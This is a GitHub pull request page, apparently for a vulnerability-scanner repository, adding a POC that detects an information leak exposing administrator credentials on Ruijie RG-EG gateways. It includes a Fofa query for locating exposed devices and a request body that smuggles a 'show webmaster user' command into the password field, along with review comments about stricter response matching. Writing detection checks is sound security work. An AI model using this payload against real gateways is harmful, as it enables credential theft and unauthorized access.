Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create ruijie-eg-info-leak #1214

Merged
merged 13 commits into from
Jul 9, 2021
Merged

Create ruijie-eg-info-leak #1214

merged 13 commits into from
Jul 9, 2021

Conversation

exp1orer
Copy link
Contributor

@exp1orer exp1orer commented May 4, 2021
edited

本 poc 是检测什么漏洞的

锐捷网关(RG-EG)信息泄露管理员账号密码

测试环境

Fofa:app="Ruijie-EG易网关"

备注

测试POC请使用如下系统:
image

image

@smile-jpg smile-jpg added this to 待审核 in POC审核 via automation May 8, 2021
@smile-jpg smile-jpg moved this from 待审核 to 阅读通过 in POC审核 May 8, 2021
smile-jpg
smile-jpg reviewed May 14, 2021
View reviewed changes
pocs/ruijie-eg-info-leak.yml Outdated
body: |
username=admin&password=admin?show+webmaster+user
expression: |
response.status == 200 && "{\"data\":\".*?(\\w+)\\s(\\w+)\",\"status\":1}".bmatches(response.body)
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

这里的匹配规则较弱,容易误报。建议通过访问一个需要登录的页面来验证

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

已修改。

@smile-jpg smile-jpg added the 等待作者修改 poc 有问题,等修改后继续 review label May 14, 2021
smile-jpg
smile-jpg reviewed May 28, 2021
View reviewed changes
pocs/ruijie-eg-info-leak.yml Outdated
body: |
username={{username}}&password={{password}}
expression: |
response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

这里的匹配规则还是太弱了,容易误报。建议加上 ruijie 相关特征的匹配,我看响应头里有:Set-Cookie: RUIJIEID....... 可以加到匹配规则里。同时,建议在 response.status == 200 后面加上对 Content-Type 的匹配

@smile-jpg smile-jpg moved this from 阅读通过 to 已测试 in POC审核 Jun 7, 2021
@smile-jpg smile-jpg merged commit 238be64 into chaitin:master Jul 9, 2021
POC审核 automation moved this from 已测试 to 已完成 Jul 9, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smile-jpg smile-jpg smile-jpg left review comments

Assignees
No one assigned
Labels
等待作者修改 poc 有问题,等修改后继续 review
Projects
POC审核
已完成
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@exp1orer @smile-jpg